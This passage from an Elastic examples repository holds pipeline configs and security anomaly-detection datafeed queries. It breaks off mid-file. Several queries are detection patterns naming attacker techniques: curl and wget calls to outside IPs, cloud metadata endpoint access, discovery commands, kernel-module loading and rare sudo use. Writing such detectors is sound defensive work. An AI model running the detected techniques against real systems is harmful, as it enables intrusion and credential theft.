--------------------------------------------------------------------------------
/GKE-On-Prem/elasticsearch-hosts-ports:
--------------------------------------------------------------------------------
1 | Single line
2 | One or more URLs
3 | Double quotes around each URL
4 | Comma between each double quoted URL
5 | Square brackets around the list
6 | Remove these instructions once you edit the line below
7 | ["http://<hostname or IP>:<port>", "http://<hostname or IP>:<port>", "http://<hostname or IP>:<port>"]
8 | 


--------------------------------------------------------------------------------
/GKE-On-Prem/kibana-host-port:
--------------------------------------------------------------------------------
1 | Single line
2 | One URL
3 | Double quotes around the URL
4 | Remove these instructions once you edit the line below
5 | "http://<hostname or IP>:<port>"
6 | 


--------------------------------------------------------------------------------
/Graph/apache_logs_security_analysis/filebeat_secrepo.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - input_type: log
 3 |   paths:
 4 |     - ./data/access*
 5 |   document_type: logs
 6 |   harvester_limit: 100
 7 |   close_eof: true
 8 | 
 9 | output.elasticsearch:
10 |   hosts: ["localhost:9200"]
11 |   index: "secrepo"
12 |   username: elastic
13 |   password: changeme
14 |   template.enabled: true
15 |   template.name: secrepo
16 |   template.path: "secrepo.json"
17 |   template.overwrite: true
18 |   pipeline: secrepo_pipeline


--------------------------------------------------------------------------------
/Graph/apache_logs_security_analysis/logstash/patterns/custom:
--------------------------------------------------------------------------------
1 | HTTP_METHOD GET|POST|PUT|HEAD|OPTIONS|TRACE|PROPFIND
2 | HTTP_VERSION HTTP/%{BASE10NUM}
3 | URL_PARTS %{DATA:url}(%{URIPARAM:params})?


--------------------------------------------------------------------------------
/Graph/apache_logs_security_analysis/requirements.txt:
--------------------------------------------------------------------------------
1 | python-dateutil==2.6.0
2 | requests==2.12.1
3 | six==1.10.0
4 | 


--------------------------------------------------------------------------------
/Graph/apache_logs_security_analysis/secrepo_graph.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Graph/apache_logs_security_analysis/secrepo_graph.jpg


--------------------------------------------------------------------------------
/Graph/movie_recommendations/movie_lens_date_clustering.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Graph/movie_recommendations/movie_lens_date_clustering.jpg


--------------------------------------------------------------------------------
/Graph/movie_recommendations/movie_lens_example_graph.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Graph/movie_recommendations/movie_lens_example_graph.jpg


--------------------------------------------------------------------------------
/Graph/movie_recommendations/movie_lens_total_reviews_by_date.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Graph/movie_recommendations/movie_lens_total_reviews_by_date.png


--------------------------------------------------------------------------------
/Graph/movie_recommendations/requirements.txt:
--------------------------------------------------------------------------------
1 | elasticsearch==5.0.1
2 | requests==2.12.1
3 | six==1.10.0
4 | urllib3==1.19.1
5 | 


--------------------------------------------------------------------------------
/Machine Learning/Analytics Jupyter Notebooks/README.md:
--------------------------------------------------------------------------------
 1 | ## Kibana Sample Flights Data Classification Example
 2 | 
 3 | Set up a local instance of Jupyter using the following instructions
 4 | 
 5 | 1. Set up a virtual environment called `env` 
 6 | 
 7 | ```
 8 | python3 -m venv env
 9 | ``` 
10 | 
11 | 2. Activate it
12 | 
13 | ```
14 | source env/bin/activate
15 | ```
16 | 
17 | 3. Install the required dependencies for your chosen Jupyter notebook
18 | 
19 | ```
20 | pip install -r some-requirements-file-name.txt
21 | ```
22 | 
23 | 4. Launch Jupyter
24 | 
25 | ```
26 | jupyter notebook
27 | ```
28 | 
29 | 
30 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/security_linux/logo.json:
--------------------------------------------------------------------------------
1 | {
2 |   "icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/security_windows/logo.json:
--------------------------------------------------------------------------------
1 | {
2 |   "icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/security_windows/ml/datafeed_v2_windows_rare_metadata_process.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "JOB_ID",
 3 |   "indices": [
 4 |     "INDEX_PATTERN_NAME"
 5 |   ],
 6 |   "max_empty_searches": 10,
 7 |   "query": {
 8 |     "bool": {
 9 |       "filter": [
10 |         {
11 |           "term": {
12 |             "host.os.family": "windows"
13 |           }
14 |         },
15 |         {
16 |           "term": {
17 |             "destination.ip": "169.254.169.254"
18 |           }
19 |         }
20 |       ]
21 |     }
22 |   }
23 | }
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/security_windows/ml/datafeed_v2_windows_rare_metadata_user.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "JOB_ID",
 3 |   "indices": [
 4 |     "INDEX_PATTERN_NAME"
 5 |   ],
 6 |   "max_empty_searches": 10,
 7 |   "query": {
 8 |     "bool": {
 9 |       "filter": [
10 |         {
11 |           "term": {
12 |             "host.os.family": "windows"
13 |           }
14 |         },
15 |         {
16 |           "term": {
17 |             "destination.ip": "169.254.169.254"
18 |           }
19 |         }
20 |       ]
21 |     }
22 |   }
23 | }
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/logo.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_network_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |             "bool": {
 9 |               "filter": [
10 |                 {"term": {"event.action": "connected-to"}},
11 |                 {"term": {"agent.type": "auditbeat"}}
12 |               ],
13 |               "must_not": [
14 |                 {
15 |                   "bool": {
16 |                     "should": [
17 |                       {"term": {"destination.ip": "127.0.0.1"}},
18 |                       {"term": {"destination.ip": "127.0.0.53"}},
19 |                       {"term": {"destination.ip": "::1"}}
20 |                     ],
21 |                     "minimum_should_match": 1
22 |                   }
23 |                 }
24 |               ]
25 |             }
26 |         }
27 |     }
28 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_network_port_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"term": {"event.action": "connected-to"}},
11 |           {"term": {"agent.type": "auditbeat"}}
12 |         ],
13 |         "must_not": [
14 |           {
15 |             "bool": {
16 |               "should": [
17 |                 {"term": {"destination.ip":"::1"}},
18 |                 {"term": {"destination.ip":"127.0.0.1"}},
19 |                 {"term": {"destination.ip":"::"}},
20 |                 {"term": {"user.name_map.uid":"jenkins"}}
21 |               ],
22 |               "minimum_should_match": 1
23 |             }
24 |           }
25 |         ]
26 |       }
27 |     }
28 |   }
29 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_network_service.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "bound-socket"}},
11 |             {"term": {"agent.type": "auditbeat"}}
12 |           ],
13 |           "must_not": [
14 |             {
15 |               "bool": {
16 |                 "should": [
17 |                   {"term": {"process.name": "dnsmasq"}},
18 |                   {"term": {"process.name": "docker-proxy"}},
19 |                   {"term": {"process.name": "rpcinfo"}}
20 |                 ],
21 |                 "minimum_should_match": 1
22 |               }
23 |             }
24 |         ]
25 |         }
26 |       }
27 |   }
28 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_network_url_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool":{
 9 |           "filter": [
10 |             {"exists": {"field": "destination.ip"}},
11 |             {"terms": {"process.name": ["curl", "wget"]}},
12 |             {"term": {"agent.type": "auditbeat"}}
13 |           ],
14 |           "must_not":[
15 |             {
16 |               "bool":{
17 |                 "should":[
18 |                     {"term":{"destination.ip": "::1"}},
19 |                     {"term":{"destination.ip": "127.0.0.1"}},
20 |                     {"term":{"destination.ip":"169.254.169.254"}}
21 |                   ],
22 |                   "minimum_should_match": 1
23 |                 }
24 |               }
25 |             ]
26 |         }
27 |       }
28 |     }
29 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_process_all_hosts_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"terms": {"event.action": ["process_started", "executed"]}},
11 |             {"term": {"agent.type": "auditbeat"}}
12 |           ],
13 |           "must_not": [
14 |             {
15 |               "bool": {
16 |                 "should": [
17 |                   {"term": {"user.name": "jenkins-worker"}},
18 |                   {"term": {"user.name": "jenkins-user"}},
19 |                   {"term": {"user.name": "jenkins"}},
20 |                   {"wildcard": {"process.name": {"wildcard": "jenkins*"}}}
21 |                 ],
22 |                 "minimum_should_match": 1
23 |               }
24 |             }
25 |           ]
26 |         }
27 |     }
28 | }
29 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_anomalous_user_name_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "filter": [
10 |               {"terms": {"event.action": ["process_started", "executed"]}},
11 |               {"term": {"agent.type":"auditbeat"}}
12 |             ]
13 |           }
14 |       }
15 |     }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_network_configuration_discovery.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "must": [
10 |               {
11 |                 "bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "arp"}},
14 |                     {"term": {"process.name": "echo"}},
15 |                     {"term": {"process.name": "ethtool"}},
16 |                     {"term": {"process.name": "ifconfig"}},
17 |                     {"term": {"process.name": "ip"}},
18 |                     {"term": {"process.name": "iptables"}},
19 |                     {"term": {"process.name": "ufw"}}
20 |                   ]
21 |                 }
22 |               }
23 |             ]
24 |         }
25 |     }
26 | }
27 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_network_connection_discovery.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "must": [
10 |               {
11 |                 "bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "netstat"}},
14 |                     {"term": {"process.name": "ss"}},
15 |                     {"term": {"process.name": "route"}},
16 |                     {"term": {"process.name": "showmount"}}
17 |                   ]
18 |                 }
19 |               }
20 |             ]
21 |         }
22 |     }
23 | }
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_kernel_module_arguments.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "filter": [{"exists": {"field": "process.title"}}],
10 |             "must": [
11 |                 {"bool": {
12 |                     "should": [
13 |                     {"term": {"process.name": "insmod"}},
14 |                     {"term": {"process.name": "kmod"}},
15 |                     {"term": {"process.name": "modprobe"}},
16 |                     {"term": {"process.name": "rmod"}}
17 |                     ]
18 |                 }}
19 |             ]
20 |         }
21 |     }
22 | }
23 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_metadata_process.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [{"term": {"destination.ip": "169.254.169.254"}}]
10 |       }
11 |     }
12 |   }
13 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_metadata_user.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [{"term": {"destination.ip": "169.254.169.254"}}]
10 |       }
11 |     }
12 |   }
13 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_sudo_user.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"term": {"event.action": "executed"}},
11 |           {"term": {"process.name": "sudo"}}
12 |         ]
13 |       }
14 |     }
15 |   }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_rare_user_compiler.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "filter": [{"term": {"event.action": "executed"}}],
10 |             "must": [
11 |               {"bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "compile"}},
14 |                     {"term": {"process.name": "gcc"}},
15 |                     {"term": {"process.name": "make"}},
16 |                     {"term": {"process.name": "yasm"}}
17 |                   ]
18 |                 }}
19 |             ]
20 |         }
21 |     }
22 | }
23 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_system_process_discovery.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "must": [
10 |               {
11 |                 "bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "ps"}},
14 |                     {"term": {"process.name": "top"}}
15 |                   ]
16 |                 }
17 |               }
18 |             ]
19 |         }
20 |     }
21 | }
22 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_linux_system_user_discovery.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |             "must": [
10 |               {
11 |                 "bool": {
12 |                   "should": [
13 |                     {"term": {"process.name": "users"}},
14 |                     {"term": {"process.name": "w"}},
15 |                     {"term": {"process.name": "who"}},
16 |                     {"term": {"process.name": "whoami"}}
17 |                   ]
18 |                 }
19 |               }
20 |             ]
21 |         }
22 |     }
23 | }
24 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat/ml/datafeed_rare_process_by_host_linux_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"terms": {"event.action": ["process_started", "executed"]}},
11 |           { "term": { "agent.type": "auditbeat" } }
12 | 
13 |         ]
14 |       }
15 |     }
16 |   }
17 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat_auth/logo.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat_auth/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "id": "siem_auditbeat_auth",
 3 |   "title": "Security: Auditbeat Authentication",
 4 |   "description": "Detect suspicious authentication events in Auditbeat data.",
 5 |   "type": "Auditbeat data",
 6 |   "logoFile": "logo.json",
 7 |   "defaultIndexPattern": "auditbeat-*",
 8 |   "query": {
 9 |     "bool": {
10 |       "filter": [
11 |         {"term": {"event.category": "authentication"}},
12 |         {"term": {"agent.type": "auditbeat"}}
13 |       ],
14 |       "must_not": { "terms": { "_tier": [ "data_frozen", "data_cold" ] } }
15 |     }
16 |   },
17 |   "jobs": [
18 |     {
19 |       "id": "suspicious_login_activity_ecs",
20 |       "file": "suspicious_login_activity_ecs.json"
21 |     }
22 |   ],
23 |   "datafeeds": [
24 |     {
25 |       "id": "datafeed-suspicious_login_activity_ecs",
26 |       "file": "datafeed_suspicious_login_activity_ecs.json",
27 |       "job_id": "suspicious_login_activity_ecs"
28 |     }
29 |   ]
30 | }
31 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_auditbeat_auth/ml/datafeed_suspicious_login_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "JOB_ID",
 3 |   "indices": [
 4 |     "INDEX_PATTERN_NAME"
 5 |   ],
 6 |   "max_empty_searches": 10,
 7 |   "query": {
 8 |     "bool": {
 9 |       "filter": [
10 |         {"term": { "event.category": "authentication" }},
11 |         {"term": { "agent.type": "auditbeat" }}
12 |       ]
13 |     }
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/logo.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_rare_process_by_host_windows_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [
10 |           {"term": { "event.action": "Process Create (rule: ProcessCreate)" }},
11 |           {"term": {"agent.type": "winlogbeat"}}
12 |         ]
13 |       }
14 |     }
15 |   }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_network_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Network connection detected (rule: NetworkConnect)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ],
13 |           "must_not": [
14 |             {
15 |               "bool": {
16 |                 "should": [
17 |                   {"term": {"destination.ip": "127.0.0.1"}},
18 |                   {"term": {"destination.ip": "127.0.0.53"}},
19 |                   {"term": {"destination.ip": "::1"}}
20 |                 ],
21 |                 "minimum_should_match": 1
22 |               }
23 |             }
24 |           ]
25 |         }
26 |     }
27 | }
28 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_path_activity_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Process Create (rule: ProcessCreate)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_process_all_hosts_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Process Create (rule: ProcessCreate)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_process_creation.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Process Create (rule: ProcessCreate)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |       }
14 |     }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_script.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"winlog.channel": "Microsoft-Windows-PowerShell/Operational"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_service.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.code": "7045"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_anomalous_user_name_ecs.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.action": "Process Create (rule: ProcessCreate)"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 | }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_rare_metadata_process.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [{"term": {"destination.ip": "169.254.169.254"}}]
10 |       }
11 |     }
12 |   }
13 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_rare_metadata_user.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |       "bool": {
 9 |         "filter": [{"term": {"destination.ip": "169.254.169.254"}}]
10 |       }
11 |     }
12 |   }
13 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat/ml/datafeed_windows_rare_user_runas_event.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "job_id": "JOB_ID",
 3 |     "indices": [
 4 |       "INDEX_PATTERN_NAME"
 5 |     ],
 6 |     "max_empty_searches": 10,
 7 |     "query": {
 8 |         "bool": {
 9 |           "filter": [
10 |             {"term": {"event.code": "4648"}},
11 |             {"term": {"agent.type": "winlogbeat"}}
12 |           ]
13 |         }
14 |       }
15 |     }
16 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat_auth/logo.json:
--------------------------------------------------------------------------------
1 | {
2 | 	"icon": "logoSecurity"
3 | }
4 | 


--------------------------------------------------------------------------------
/Machine Learning/Anomaly Detection/siem_winlogbeat_auth/manifest.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "id": "siem_winlogbeat_auth",
 3 |   "title": "Security: Winlogbeat Authentication",
 4 |   "description": "Detect suspicious authentication events in Winlogbeat data.",
 5 |   "type": "Winlogbeat data",
 6 |   "logoFile": "logo.json",
 7 |   "defaultIndexPattern": "winlogbeat-*",
 8 |   "query": {
 9 |     "bool": {
10 |       "filter": [
11 |         {"term": {"agent.type": "winlogbeat"}},
12 |         {"term": {"event.category": "authentication"}}
13 |       ],
14 |       "must_not": { "terms": { "_tier": [ "data_frozen", "data_cold" ] } }
15 |     }
16 |   },
17 |   "jobs": [
18 |     {
19 |       "id": "windows_rare_user_type10_remote_login",
20 |       "file": "windows_rare_user_type10_remote_login.json"
21 |     }
22 |   ],
23 |   "datafeeds": [
24 |     {
25 |       "id": "datafeed-windows_rare_user_type10_remote_login",
26 |       "file": "datafeed_windows_rare_user_type10_remote_login.json",
27 |       "job_id": "windows_rare_user_type10_remote_login"
28 |     }
29 |   ]
30 | }
31 | 


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/README.md:
--------------------------------------------------------------------------------
1 | Each subfolder contains information that will allow you to configure, run, and test an example Business Metrics machine learning use case. Business Metrics use cases detect anomalies in metrics/KPIs that are directly associated with, or may impact, business performance. Each detected anomaly is assigned a normalized Anomaly Score, and is annotated with values of other fields in the data that have statistical influence on the anomaly, called influencers.
2 | 


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/twitter_trends/configs/filebeat/filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - input_type: log
 3 |   paths:
 4 |     - tweets.csv
 5 |   fields:
 6 |     topic: apm
 7 |   json.keys_under_root: true
 8 | 
 9 | output.elasticsearch:
10 |   hosts: ["localhost:9200"]
11 |   username: "elastic"
12 |   password: "changeme"
13 |   index: "twitter-test"
14 |   template.enabled: true
15 |   template.path: "twitter.json"
16 |   template.overwrite: true


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/twitter_trends/configs/logstash/logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   twitter {
 3 |     consumer_key       => "INSERT YOUR CONSUMER KEY"
 4 |     consumer_secret    => "INSERT YOUR CONSUMER SECRET"
 5 |     oauth_token        => "INSERT YOUR ACCESS TOKEN"
 6 |     oauth_token_secret => "INSERT YOUR ACCESS TOKEN SECRET"
 7 |     keywords           => [ "thor", "spiderman", "wolverine", "ironman", "hulk"]
 8 |     full_tweet         => true
 9 |     add_field => { "fields.topic" => "super_heroes" }
10 |   }
11 | }
12 | 
13 | filter {
14 | 
15 | 
16 | }
17 | 
18 | output {
19 |   stdout {
20 |     codec => dots
21 |   }
22 |   elasticsearch {
23 |       hosts => "localhost:9200"
24 |       index         => "twitter-example"
25 |       document_type => "tweets"
26 |       template      => "./twitter.json"
27 |       template_name => "twitter"
28 |       template_overwrite => true
29 |       user => "elastic"
30 |       password => "changeme"
31 |   }
32 | }
33 | 


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/twitter_trends/machine_learning/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "datafeed_id": "datafeed-twitter_trends",
 3 |     "job_id": "twitter_trends",
 4 |     "query_delay": "60s",
 5 |     "frequency": "450s",
 6 |     "indexes": [
 7 |       "twitter-*"
 8 |     ],
 9 |     "types": [
10 |       "_default_",
11 |       "log"
12 |     ],
13 |     "query": {
14 |       "match_all": {
15 |         "boost": 1
16 |       }
17 |     },
18 |     "scroll_size": 1000,
19 |     "chunking_config": {
20 |       "mode": "auto"
21 |     }
22 | }


--------------------------------------------------------------------------------
/Machine Learning/Business Metrics Recipes/twitter_trends/machine_learning/job.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "job_id": "twitter_trends",
 3 |   "job_type": "anomaly_detector",
 4 |   "analysis_config": {
 5 |     "bucket_span": "10m",
